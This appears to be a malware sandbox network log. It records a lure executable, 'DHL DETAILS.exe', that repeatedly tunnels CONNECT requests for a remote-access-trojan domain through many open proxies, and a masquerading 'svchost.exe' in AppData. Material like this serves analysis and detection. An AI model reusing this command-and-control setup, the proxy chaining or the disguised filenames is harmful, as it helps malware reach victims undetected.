Mar 9, 2024 13:14:19.701839924 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1558	192.168.2.5	54763	104.19.217.219	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.705218077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.861601114 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1559	192.168.2.5	54523	41.223.232.117	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.705218077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.600924969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.880280018 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1560	192.168.2.5	54764	104.27.66.31	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.705374956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.861618042 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1561	192.168.2.5	54765	172.67.182.38	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.705379009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.861447096 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1562	192.168.2.5	54754	104.22.37.236	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.706326962 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.862651110 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1563	192.168.2.5	54771	104.20.205.191	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.708209038 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.864572048 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1564	192.168.2.5	54774	172.64.86.217	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.708292961 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.864590883 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1565	192.168.2.5	54785	172.67.182.153	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.713591099 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.869728088 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1566	192.168.2.5	54786	104.19.235.10	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.714518070 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.870949984 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1567	192.168.2.5	54668	74.119.147.209	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.714663029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1568	192.168.2.5	54791	45.12.31.104	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.715928078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.872205019 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1569	192.168.2.5	54794	104.23.100.73	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.717097998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.873426914 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1570	192.168.2.5	54706	172.93.213.177	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.727531910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1571	192.168.2.5	54636	222.124.29.59	5678	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.727534056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1572	192.168.2.5	54510	47.91.104.88	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.727799892 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1573	192.168.2.5	53772	68.71.247.130	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.743015051 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1574	192.168.2.5	54572	94.131.60.199	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.790220976 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3670 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-seri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1575	192.168.2.5	54042	92.204.136.149	18629	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.827476978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1576	192.168.2.5	54530	123.241.210.123	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.837739944 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1577	192.168.2.5	54827	104.27.26.29	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.838006020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.993756056 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1578	192.168.2.5	54841	172.67.181.37	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.838368893 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
